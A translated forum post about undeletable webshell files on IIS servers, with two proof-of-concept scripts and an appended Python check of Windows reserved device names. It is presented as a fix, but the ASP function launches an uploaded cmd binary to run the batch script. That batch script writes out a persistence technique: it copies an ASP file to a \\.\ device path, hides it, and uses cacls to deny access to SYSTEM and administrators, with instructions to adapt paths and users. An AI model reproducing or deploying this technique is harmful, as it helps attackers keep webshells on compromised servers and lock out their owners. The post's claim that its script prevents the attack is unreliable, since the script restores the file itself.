In this case, a file seen from a webshell (and only from a webshell) cannot be deleted or modified. Once its attributes are cleared the file can be deleted, but it instantly "comes back to life at full health, in its original place".
I seem to have run into this situation before, and discussed it with knell at the time. We agreed that a file on the server picks up some parameters through Request, uses Server.CreateObject("Scripting.FileSystemObject") to create the "undeletable" file and set its Attributes, and that an external server then keeps sending GET and POST requests to restore the file without limit.
To deal with this, I wrote a script; in testing it perfectly prevents this disgusting attack method.
Poc.1:
____________________________________________________________________________
Function DelAttrib(TheFile) ' TheFile is the file to be modified; it is best to write a form yourself to pass it in.
    Dim fs, f, FN
    Response.Write "Loading...:" & TheFile & "...<br>"
    Set fs = Server.CreateObject("Scripting.FileSystemObject")
    If fs.FileExists("\\.\" & TheFile) Then
        Set f = fs.GetFile("\\.\" & TheFile)
        f.Attributes = 0 ' Clear the attributes
        Set f = Nothing
        Response.Write "Less Success!" ' Prompt after success
        If Right(TheFile, 1) = "\" Or Right(TheFile, 1) = "/" Or Left(Right(TheFile, 4), 1) <> "." Then
            Call fs.DeleteFolder("\\.\" & TheFile, True) ' Delete the object
            Response.Write "Delete Success!"
        Else
            If fs.FileExists("\\.\" & TheFile) Then
                ' File name only, lower-cased, without the directory part
                FN = LCase(Mid(TheFile, InStrRev(Replace(TheFile, "\", "/"), "/") + 1))
                ' Only touch the attributes when the name contains no Windows reserved word
                If InStr(FN, "com") < 1 And InStr(FN, "con") < 1 And InStr(FN, "aux") < 1 And InStr(FN, "prn") < 1 And InStr(FN, "nul") < 1 Then
                    Set f = fs.GetFile("\\.\" & TheFile)
                    f.Attributes = 0
                    Set f = Nothing
                End If
                fs.DeleteFile("\\.\" & TheFile) ' Deletion mode based on Windows reserved words
                Response.Write "Delete Success"
            Else
                Response.Write "Open File Fail!" ' Error message
            End If
        End If
    Else
        Response.Write "Open File Fail!"
    End If
    Dim WshShell, StrExec, ExecName
    Set WshShell = Server.CreateObject("WScript.Shell") ' Call WScript to execute the bat script of Poc.2
    StrExec = "D:\webcmd.exe /c" ' The custom cmd file
    ExecName = "D:\webjfcx1_dea.bat" ' The bat script uploaded to the server
    WshShell.Exec(StrExec & " " & ExecName).StdOut.ReadAll
    Set fs = Nothing
End Function
_____________________________________________________________________________
Poc.2:
--------------------------------------------
copy d:\weba.asp \\.\d:\web.asp & attrib \\.\d:\web.asp +a +r +s +h & cacls \\.\d:\web.asp /e /d IUSR_WSPC-HVJ5FRCT79 & cacls \\.\d:\web.asp /e /g IUSR_WSPC-HVJ5FRCT79:r & cacls \\.\d:\web.asp /e /d users & cacls \\.\d:\web.asp /e /g users:r & cacls \\.\d:\web.asp /e /d system & cacls \\.\d:\web.asp /e /d administrators
Save the script as a .bat file. d:\weba.asp is the path of the file you created, and d:\web.asp is the path of the file that is automatically restored. The IIS user and groups differ from server to server, so modify them and the file paths yourself.
--------------------------------------------
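The reserved-word test in Poc.1 is a substring match, so it also fires on ordinary names and misses LPT devices. As an added example (Python, not the author's script), the check below matches the part of the file name before the first dot against the exact Windows device names and lists where the two tests disagree; the sample paths are constructed.

```python
import ntpath
import re

# Exact Windows reserved device names: CON, PRN, AUX, NUL, COM1-9, LPT1-9.
RESERVED = re.compile(r"^(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])$", re.IGNORECASE)


def reserved_device_name(path):
    """Return the device name a file name resolves to, or None for a normal name."""
    name = ntpath.basename(path.replace("/", "\\"))
    # Win32 looks only at the part before the first dot, ignoring trailing spaces,
    # so NUL.asp and NUL.tar.asp are both treated as NUL.
    stem = name.split(".", 1)[0].rstrip(" ")
    return stem.upper() if RESERVED.match(stem) else None


def poc1_substring_check(path):
    """The InStr() test from Poc.1: True when any listed word occurs in the name."""
    norm = path.replace("\\", "/")
    fn = norm[norm.rfind("/") + 1:].lower()
    return any(word in fn for word in ("com", "con", "aux", "prn", "nul"))


def mismatches(paths):
    """Paths where the substring test and the exact test give different answers."""
    return [p for p in paths
            if (reserved_device_name(p) is not None) != poc1_substring_check(p)]


# Constructed sample listing of a web root (not taken from the page).
SAMPLE = [
    r"d:\web\aux.asp",      # reserved, both tests agree
    r"d:\web\nul.tar.asp",  # reserved, both tests agree
    r"d:\web\lpt1.asp",     # reserved, but "lpt" is not in the Poc.1 list
    r"d:\web\contact.asp",  # ordinary file that contains "con"
    r"d:\web\common.asp",   # ordinary file that contains "com"
    r"d:\web\index.asp",    # ordinary file, both tests agree
]

if __name__ == "__main__":
    for p in SAMPLE:
        print(f"{p:22} exact={reserved_device_name(p)!s:5} "
              f"substring={poc1_substring_check(p)}")
    print("disagree:", mismatches(SAMPLE))
```

For the files in the disagreement list, Poc.1 either skips clearing the attributes of an ordinary file before deleting it or calls GetFile on a name that really is a device.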